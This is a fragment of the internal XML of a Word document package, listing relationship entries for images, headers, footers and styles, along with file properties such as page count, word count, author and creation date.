Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><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8.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId8"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0</TotalTime>
  <Pages>20</Pages>
  <Words>2893</Words>
  <Characters>16164</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>333</Lines>
  <Paragraphs>164</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>19254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hadi wasim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hadi wasim</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-07T14:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-07T14:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>